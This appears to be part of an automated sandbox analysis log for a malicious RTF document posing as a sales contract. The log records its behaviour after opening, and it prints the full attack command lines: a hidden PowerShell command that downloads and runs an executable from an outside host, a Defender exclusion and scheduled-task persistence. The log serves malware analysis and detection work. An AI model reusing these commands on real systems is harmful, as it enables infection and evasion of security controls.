          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmpJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
          Source: Revised sales contract for Crosswear.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Revised sales contract for Crosswear.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$vised sales contract for Crosswear.rtfJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5CAF.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@44/31@8/3
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\mum.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\mum.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\mum.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\mum.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\mum.exeMutant created: \Sessions\1\BaseNamedObjects\QgnNxTzT
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: mum[1].exe.0.dr, u0006u2000.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: mum.exe.4.dr, u0006u2000.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: RRUwFfPTEDHYrl.exe.8.dr, u0006u2000.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 8.0.mum.exe.11b0000.0.unpack, u0006u2000.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 15.0.mum.exe.400000.0.unpack, ???u0089ufffd/u07b9???Z.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 15.0.mum.exe.400000.0.unpack, u0097?ufffd?t/B?ufffd??.csCryptographic APIs: 'TransformFinalBlock'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Roaming\mum.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Roaming\mum.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Roaming\mum.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: :\Windows\mscorlib.pdb3 source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb#\'$ source: powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb?\'$ source: powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb/ source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: mum[1].exe.0.dr, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: mum.exe.4.dr, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: RRUwFfPTEDHYrl.exe.8.dr, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.mum.exe.11b0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_054C361B push ecx; retf 8_2_054C361E
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C12EF push eax; retn 0026h15_2_002C12F9
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0535361B push ecx; retf 19_2_0535361E
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C12EF push eax; retn 0016h26_2_001C12F9
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_0512361B push ecx; retf 29_2_0512361E
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_002512EF push eax; retn 001Bh34_2_002512F9
          Source: initial sampleStatic PE information: section name: .text entropy: 7.984077210113765
          Source: initial sampleStatic PE information: section name: .text entropy: 7.984077210113765
          Source: initial sampleStatic PE information: section name: .text entropy: 7.984077210113765

          Persistence and Installation Behavior

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mum.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\mum.exeFile created: C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
